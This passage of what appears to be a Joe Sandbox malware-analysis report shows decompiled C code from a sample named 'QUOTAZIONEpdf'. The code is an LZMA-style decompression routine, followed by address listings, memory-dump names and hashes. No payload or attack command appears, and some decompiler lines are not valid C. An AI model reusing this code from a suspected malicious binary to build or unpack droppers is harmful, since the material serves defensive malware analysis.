							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                0x00405ead
                0x00405eb4
                0x00405eba
                0x00405ec0
                0x00000000
                0x00405ec4
                0x00405ed0
                0x00405ed0
                0x00405ed0
                0x00405ed9
                0x00000000
                0x00000000
                0x00405edf
                0x00000000
                0x00405ee6
                0x00405eea
                0x00000000
                0x00000000
                0x00405ef3
                0x00405ef6
                0x00405ef9
                0x00405efb
                0x00405efd
                0x00000000
                0x00000000
                0x00405f03
                0x00405f06
                0x00405f08
                0x00405f09
                0x00405f0c
                0x00405f0e
                0x00405f0f
                0x00405f11
                0x00405f14
                0x00405f19
                0x00405f1e
                0x00405f27
                0x00405f3a
                0x00405f3d
                0x00405f46
                0x00405f49
                0x00405f71
                0x00405f71
                0x00405f73
                0x00405f81
                0x00405f81
                0x00405f85
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405f75
                0x00405f75
                0x00405f78
                0x00405f78
                0x00405f79
                0x00405f79
                0x00000000
                0x00405f75
                0x00405f4b
                0x00405f4f
                0x00405f54
                0x00405f54
                0x00405f5d
                0x00405f63
                0x00405f65
                0x00405f68
                0x00000000
                0x00405f6e
                0x00405f6e
                0x00000000
                0x00405f6e
                0x00000000
                0x00405f8b
                0x00405f8b
                0x00405f8f
                0x0040683b
                0x00000000
                0x0040683b
                0x00405f98
                0x00405fa8
                0x00405fab
                0x00405fae
                0x00405fae
                0x00405fae
                0x00405fb1
                0x00405fb1
                0x00405fb5
                0x00000000
                0x00000000
                0x00405fb7
                0x00405fba
                0x00405fbd
                0x00405fe7
                0x00405fed
                0x00405ff4
                0x00000000
                0x00405ff4
                0x00405fbf
                0x00405fc3
                0x00405fc6
                0x00405fcb
                0x00405fcb
                0x00405fd6
                0x00405fdc
                0x00405fde
                0x00405fe1
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406026
                0x0040602c
                0x0040602f
                0x0040603c
                0x00406044
                0x00000000
                0x00000000
                0x00405ffb
                0x00405ffb
                0x00405fff
                0x0040684a
                0x00000000
                0x0040684a
                0x0040600b
                0x00406016
                0x00406016
                0x00406016
                0x00406019
                0x0040601c
                0x0040601f
                0x00406022
                0x00406024
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066bb
                0x004066bb
                0x004066c1
                0x004066c7
                0x004066ca
                0x004066cd
                0x004066e7
                0x004066ea
                0x004066f0
                0x004066fb
                0x004066fb
                0x004066fd
                0x004066cf
                0x004066cf
                0x004066de
                0x004066e2
                0x004066e2
                0x00406700
                0x00406707
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406709
                0x00406709
                0x0040670d
                0x004068bc
                0x00000000
                0x004068bc
                0x00406719
                0x00406720
                0x00406728
                0x00406728
                0x00406728
                0x0040672b
                0x0040672e
                0x0040672e
                0x00000000
                0x00000000
                0x0040604c
                0x0040604e
                0x00406051
                0x004060c2
                0x004060c5
                0x004060c8
                0x004060cf
                0x004060d9
                0x00000000
                0x004060d9
                0x00406053
                0x00406057
                0x0040605a
                0x0040605c
                0x0040605f
                0x00406062
                0x00406064
                0x00406067
                0x00406069
                0x0040606e
                0x00406071
                0x00406074
                0x00406078
                0x0040607f
                0x00406082
                0x00406089
                0x0040608d
                0x00406095
                0x00406095
                0x00406095
                0x0040608f
                0x0040608f
                0x0040608f
                0x00406084
                0x00406084
                0x00406084
                0x00406099
                0x0040609c
                0x004060ba
                0x004060bc
                0x00000000
                0x004060bc
                0x0040609e
                0x004060a1
                0x004060a4
                0x004060a7
                0x004060a9
                0x004060a9
                0x004060a9
                0x004060ac
                0x004060af
                0x004060b1
                0x004060b2
                0x004060b5
                0x00000000
                0x00000000
                0x004062eb
                0x004062ef
                0x0040630d
                0x00406310
                0x00406317
                0x0040631a
                0x0040631d
                0x00406320
                0x00406323
                0x00406326
                0x00406328
                0x0040632f
                0x00406330
                0x00406332
                0x00406335
                0x00406338
                0x0040633b
                0x0040633b
                0x00406340
                0x00000000
                0x00406340
                0x004062f1
                0x004062f4
                0x004062f7
                0x00406301
                0x00000000
                0x00000000
                0x00406355
                0x00406359
                0x0040637c
                0x0040637f
                0x00406382
                0x0040638c
                0x0040635b
                0x0040635b
                0x0040635e
                0x00406361
                0x00406364
                0x00406371
                0x00406374
                0x00406374
                0x00000000
                0x00000000
                0x00406398
                0x0040639c
                0x00000000
                0x00000000
                0x004063a2
                0x004063a6
                0x00000000
                0x00000000
                0x004063ac
                0x004063ae
                0x004063b2
                0x004063b2
                0x004063b5
                0x004063b9
                0x00000000
                0x00000000
                0x00406409
                0x0040640d
                0x00406414
                0x00406417
                0x0040641a
                0x00406424
                0x00000000
                0x00406424
                0x0040640f
                0x00000000
                0x00000000
                0x00406430
                0x00406434
                0x0040643b
                0x0040643e
                0x00406441
                0x00406436
                0x00406436
                0x00406436
                0x00406444
                0x00406447
                0x0040644a
                0x0040644a
                0x0040644d
                0x00406450
                0x00406453
                0x00406453
                0x00406456
                0x0040645d
                0x00406462
                0x00000000
                0x00000000
                0x004064f0
                0x004064f0
                0x004064f4
                0x00406892
                0x00000000
                0x00406892
                0x004064fa
                0x004064fd
                0x00406500
                0x00406504
                0x00406507
                0x0040650d
                0x0040650f
                0x0040650f
                0x0040650f
                0x00406512
                0x00406515
                0x00000000
                0x00000000
                0x004060e5
                0x004060e5
                0x004060e9
                0x00406856
                0x00000000
                0x00406856
                0x004060ef
                0x004060f2
                0x004060f5
                0x004060f9
                0x004060fc
                0x00406102
                0x00406104
                0x00406104
                0x00406104
                0x00406107
                0x0040610a
                0x0040610a
                0x0040610d
                0x00406110
                0x00000000
                0x00000000
                0x00406116
                0x0040611c
                0x00000000
                0x00000000
                0x00406122
                0x00406122
                0x00406126
                0x00406129
                0x0040612c
                0x0040612f
                0x00406132
                0x00406133
                0x00406136
                0x00406138
                0x0040613e
                0x00406141
                0x00406144
                0x00406147
                0x0040614a
                0x0040614d
                0x00406150
                0x0040616c
                0x0040616f
                0x00406172
                0x00406175
                0x0040617c
                0x00406180
                0x00406182
                0x00406186
                0x00406152
                0x00406152
                0x00406156
                0x0040615e
                0x00406163
                0x00406165
                0x00406167
                0x00406167
                0x00406189
                0x00406190
                0x00406193
                0x00000000
                0x00406199
                0x00000000
                0x00406199
                0x00000000
                0x0040619e
                0x0040619e
                0x004061a2
                0x00406862
                0x00000000
                0x00406862
                0x004061a8
                0x004061ab
                0x004061ae
                0x004061b2
                0x004061b5
                0x004061bb
                0x004061bd
                0x004061bd
                0x004061bd
                0x004061c0
                0x004061c3
                0x004061c3
                0x004061c3
                0x004061c9
                0x00000000
                0x00000000
                0x004061cb
                0x004061ce
                0x004061d1
                0x004061d4
                0x004061d7
                0x004061da
                0x004061dd
                0x004061e0
                0x004061e3
                0x004061e6
                0x004061e9
                0x00406201
                0x00406204
                0x00406207
                0x0040620a
                0x0040620a
                0x0040620d
                0x00406211
                0x00406213
                0x004061eb
                0x004061eb
                0x004061f3
                0x004061f8
                0x004061fa
                0x004061fc
                0x004061fc
                0x00406216
                0x0040621d
                0x00406220
                0x00000000
                0x00406222
                0x00000000
                0x00406222
                0x00406220
                0x00406227
                0x00406227
                0x00406227
                0x00406227
                0x00000000
                0x00000000
                0x00406262
                0x00406262
                0x00406266
                0x0040686e
                0x00000000
                0x0040686e
                0x0040626c
                0x0040626f
                0x00406272
                0x00406276
                0x00406279
                0x0040627f
                0x00406281
                0x00406281
                0x00406281
                0x00406284
                0x00406287
                0x00406287
                0x0040628d
                0x0040622b
                0x0040622b
                0x0040622e
                0x00000000
                0x0040622e
                0x0040628f
                0x0040628f
                0x00406292
                0x00406295
                0x00406298
                0x0040629b
                0x0040629e
                0x004062a1
                0x004062a4
                0x004062a7
                0x004062aa
                0x004062ad
                0x004062c5
                0x004062c8
                0x004062cb
                0x004062ce
                0x004062ce
                0x004062d1
                0x004062d5
                0x004062d7
                0x004062af
                0x004062af
                0x004062b7
                0x004062bc
                0x004062be
                0x004062c0
                0x004062c0
                0x004062da
                0x004062e1
                0x004062e4
                0x00000000
                0x004062e6
                0x00000000
                0x004062e6
                0x00000000
                0x00406573
                0x00406573
                0x00406577
                0x0040689e
                0x00000000
                0x0040689e
                0x0040657d
                0x00406580
                0x00406583
                0x00406587
                0x0040658a
                0x00406590
                0x00406592
                0x00406592
                0x00406592
                0x00406595
                0x00000000
                0x00000000
                0x00406343
                0x00406343
                0x00406346
                0x00000000
                0x00000000
                0x00406682
                0x00406686
                0x004066a8
                0x004066ab
                0x004066b5
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x00406688
                0x0040668b
                0x0040668f
                0x00406692
                0x00406692
                0x00406695
                0x00000000
                0x00000000
                0x0040673f
                0x00406743
                0x00406761
                0x00406761
                0x00406761
                0x00406768
                0x0040676f
                0x00406776
                0x00406776
                0x00000000
                0x00406776
                0x00406745
                0x00406748
                0x0040674b
                0x0040674e
                0x00406755
                0x00406699
                0x00406699
                0x0040669c
                0x00000000
                0x00000000
                0x00406830
                0x00406833
                0x00000000
                0x00000000
                0x0040646a
                0x0040646c
                0x00406473
                0x00406474
                0x00406476
                0x00406479
                0x00000000
                0x00000000
                0x00406481
                0x00406484
                0x00406487
                0x00406489
                0x0040648b
                0x0040648b
                0x0040648c
                0x0040648f
                0x00406496
                0x00406499
                0x004064a7
                0x00000000
                0x00000000
                0x0040677d
                0x0040677d
                0x00406780
                0x00406787
                0x00000000
                0x00000000
                0x0040678c
                0x0040678c
                0x00406790
                0x004068c8
                0x00000000
                0x004068c8
                0x00406796
                0x00406799
                0x0040679c
                0x004067a0
                0x004067a3
                0x004067a9
                0x004067ab
                0x004067ab
                0x004067ab
                0x004067ae
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b4
                0x004067b4
                0x004067b8
                0x00406818
                0x0040681b
                0x00406820
                0x00406821
                0x00406823
                0x00406825
                0x00406828
                0x00406734
                0x00406734
                0x00000000
                0x00406734
                0x004067ba
                0x004067c0
                0x004067c3
                0x004067c6
                0x004067c9
                0x004067cc
                0x004067cf
                0x004067d2
                0x004067d5
                0x004067d8
                0x004067db
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406801
                0x00406803
                0x00406803
                0x00406804
                0x00406807
                0x004067dd
                0x004067dd
                0x004067e5
                0x004067ea
                0x004067ec
                0x004067ef
                0x004067ef
                0x0040680a
                0x00406811
                0x00000000
                0x00406813
                0x00000000
                0x00406813
                0x00000000
                0x004064af
                0x004064b2
                0x004064e8
                0x00406618
                0x00406618
                0x00406618
                0x00406618
                0x0040661b
                0x0040661b
                0x0040661e
                0x00406620
                0x004068aa
                0x00000000
                0x004068aa
                0x00406626
                0x00406629
                0x00000000
                0x00000000
                0x0040662f
                0x00406633
                0x00406636
                0x00406636
                0x00406636
                0x00000000
                0x00406636
                0x004064b4
                0x004064b6
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c5
                0x004064c8
                0x004064de
                0x004064e3
                0x0040651b
                0x0040651b
                0x0040651f
                0x0040654b
                0x0040654d
                0x00406554
                0x00406557
                0x0040655a
                0x0040655a
                0x0040655f
                0x0040655f
                0x00406561
                0x00406564
                0x0040656b
                0x0040656e
                0x0040659b
                0x0040659b
                0x0040659e
                0x004065a1
                0x00406615
                0x00406615
                0x00406615
                0x00000000
                0x00406615
                0x004065a3
                0x004065a9
                0x004065ac
                0x004065af
                0x004065b2
                0x004065b5
                0x004065b8
                0x004065bb
                0x004065be
                0x004065c1
                0x004065c4
                0x004065dd
                0x004065df
                0x004065e2
                0x004065e3
                0x004065e6
                0x004065e8
                0x004065eb
                0x004065ed
                0x004065ef
                0x004065f2
                0x004065f4
                0x004065f7
                0x004065fb
                0x004065fd
                0x004065fd
                0x004065fe
                0x00406601
                0x00406604
                0x004065c6
                0x004065c6
                0x004065ce
                0x004065d3
                0x004065d5
                0x004065d8
                0x004065d8
                0x00406607
                0x0040660e
                0x00406598
                0x00406598
                0x00406598
                0x00406598
                0x00000000
                0x00406610
                0x00000000
                0x00406610
                0x0040660e
                0x00406521
                0x00406524
                0x00406526
                0x00406529
                0x0040652c
                0x0040652f
                0x00406531
                0x00406534
                0x00406537
                0x00406537
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406544
                0x00406518
                0x00406518
                0x00406518
                0x00406518
                0x00000000
                0x00406546
                0x00000000
                0x00406546
                0x00406544
                0x004064ca
                0x004064cd
                0x004064cf
                0x004064d2
                0x00000000
                0x00000000
                0x00406231
                0x00406231
                0x00406235
                0x0040687a
                0x00000000
                0x0040687a
                0x0040623b
                0x0040623e
                0x00406241
                0x00406244
                0x00406247
                0x0040624a
                0x0040624d
                0x0040624f
                0x00406252
                0x00406255
                0x00406258
                0x0040625a
                0x0040625a
                0x0040625a
                0x00000000
                0x00000000
                0x004063bc
                0x004063bc
                0x004063c0
                0x00406886
                0x00000000
                0x00406886
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d1
                0x004063d1
                0x004063d1
                0x004063d4
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e3
                0x004063e4
                0x004063e6
                0x004063e6
                0x004063e6
                0x004063e9
                0x004063ec
                0x004063ef
                0x004063f2
                0x004063f2
                0x004063f2
                0x004063f5
                0x004063f7
                0x004063f7
                0x00000000
                0x00000000
                0x00406639
                0x00406639
                0x00406639
                0x0040663d
                0x00000000
                0x00000000
                0x00406643
                0x00406646
                0x00406649
                0x0040664c
                0x0040664e
                0x0040664e
                0x0040664e
                0x00406651
                0x00406654
                0x00406657
                0x0040665a
                0x0040665d
                0x00406660
                0x00406661
                0x00406663
                0x00406663
                0x00406663
                0x00406666
                0x00406669
                0x0040666c
                0x0040666f
                0x00406672
                0x00406676
                0x00406678
                0x0040667b
                0x00000000
                0x0040667d
                0x004063fa
                0x004063fa
                0x00000000
                0x004063fa
                0x0040667b
                0x004068b0
                0x004068d2
                0x004068d8
                0x004068da
                0x004068e1
                0x00000000
                0x00000000
                0x00405edf
                0x004068e7
                0x004068e7
                0x00000000

                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004062EB, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E004062EB() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
